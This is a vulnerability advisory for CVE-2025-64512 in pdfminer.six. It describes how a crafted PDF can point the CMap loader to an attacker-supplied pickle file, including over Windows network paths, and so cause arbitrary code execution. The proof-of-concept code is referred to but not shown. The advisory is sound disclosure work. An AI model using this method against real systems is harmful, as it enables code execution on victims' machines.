Описание
Arbitrary Code Execution in pdfminer.six via Crafted PDF Input
Summary
pdfminer.six will execute arbitrary code from a malicious pickle file if provided with a malicious PDF file. The CMapDB._load_data() function in pdfminer.six uses pickle.loads() to deserialize pickle files. These pickle files are supposed to be part of the pdfminer.six distribution stored in the cmap/ directory, but a malicious PDF can specify an alternative directory and filename as long as the filename ends in .pickle.gz. A malicious, zipped pickle file can then contain code which will automatically execute when the PDF is processed.
Details
An attacker can:
- Create a malicious PDF with a CMap reference like
/malicious - Place a malicious pickle file at
/malicious.pickle.gz - When the PDF is processed, pdfminer loads and deserializes the malicious pickle
- The pickle deserialization can execute arbitrary Python code
POC
Malicious PDF
Create a PDF with a malicious CMAP entry:
Here the /Encoding points to /pdfs/malicious. Pdfminer will append the extension .pickle.gz to this filename. Place the PDF in a file called /pdfs/malicious.pdf.
Malicious Pickle
Create a malicious, zipped pickle to execute. For example, with this Python script:
This will create a harmless, zipped pickle file that will display "Malicious code eecuted." then exit when deserialized. Put the file in /pdfs/malicious.pickle.gz.
Test
Install pdfminer.six and run pdf2text.py /pdfs/malicious.pdf. Instead of processing the PDF as normal you should see the output:
Impact
If pdfminer.six processes a malicious PDF which points to a zipped pickle file under the control of an attacker the result is arbitrary code execution on the victim's system. An attacker could execute the Python code of their chosing with the permissions of the process running pdfminer.six.
The difficulty in achieving this depends on the OS, see below.
Linux, MacOS - harder to exploit
On Linux-like systems only files on the filesystem can be resolved. An attacker would need to provide the malicious PDF for processing and the malicious pickle file would need to be present on the target system in a location that the attacker already knows, since it needs to be set in the PDF itself. In many cases this will be difficult to exploit because even if the attacker provides both the PDF and the pickle file together, there would be no way to know in advance which full path to the pickle file to specify. In many cases this would make exploitation difficult or impossible. However:
- An attacker may find a way to write files to a known location on the target system or
- The system in question may, by design, read files from a known location such as a network share designated for PDF ingestion.
Overall, there is generally less risk on a Linux or Linux-like system.
Windows - easier to exploit
Windows paths can specify network locations e.g. WebDAV, SMB. This means that an attacker could host the malicious pickle remotely and specify a path to the it in the PDF. Since there is no need to get the malicious pickle file on to the target system, exploitation is easier on a Windows OS.
Appendix
A complete, malicious PDF is provided here. A dockerized POC is available upon request.
Ссылки
- https://github.com/pdfminer/pdfminer.six/security/advisories/GHSA-wf5f-4jwr-ppcp
- https://nvd.nist.gov/vuln/detail/CVE-2025-64512
- https://github.com/pdfminer/pdfminer.six/commit/b808ee05dd7f0c8ea8ec34bdf394d40e63501086
- https://github.com/pdfminer/pdfminer.six/releases/tag/20251107
- https://lists.debian.org/debian-lts-announce/2025/11/msg00017.html
- https://lists.debian.org/debian-lts-announce/2026/01/msg00005.html
Пакеты
pdfminer.six
< 20251107
20251107
Связанные уязвимости
Pdfminer.six is a community maintained fork of the original PDFMiner, a tool for extracting information from PDF documents. Prior to version 20251107, pdfminer.six will execute arbitrary code from a malicious pickle file if provided with a malicious PDF file. The `CMapDB._load_data()` function in pdfminer.six uses `pickle.loads()` to deserialize pickle files. These pickle files are supposed to be part of the pdfminer.six distribution stored in the `cmap/` directory, but a malicious PDF can specify an alternative directory and filename as long as the filename ends in `.pickle.gz`. A malicious, zipped pickle file can then contain code which will automatically execute when the PDF is processed. Version 20251107 fixes the issue.
Pdfminer.six is a community maintained fork of the original PDFMiner, a tool for extracting information from PDF documents. Prior to version 20251107, pdfminer.six will execute arbitrary code from a malicious pickle file if provided with a malicious PDF file. The `CMapDB._load_data()` function in pdfminer.six uses `pickle.loads()` to deserialize pickle files. These pickle files are supposed to be part of the pdfminer.six distribution stored in the `cmap/` directory, but a malicious PDF can specify an alternative directory and filename as long as the filename ends in `.pickle.gz`. A malicious, zipped pickle file can then contain code which will automatically execute when the PDF is processed. Version 20251107 fixes the issue.
Pdfminer.six is a community maintained fork of the original PDFMiner, ...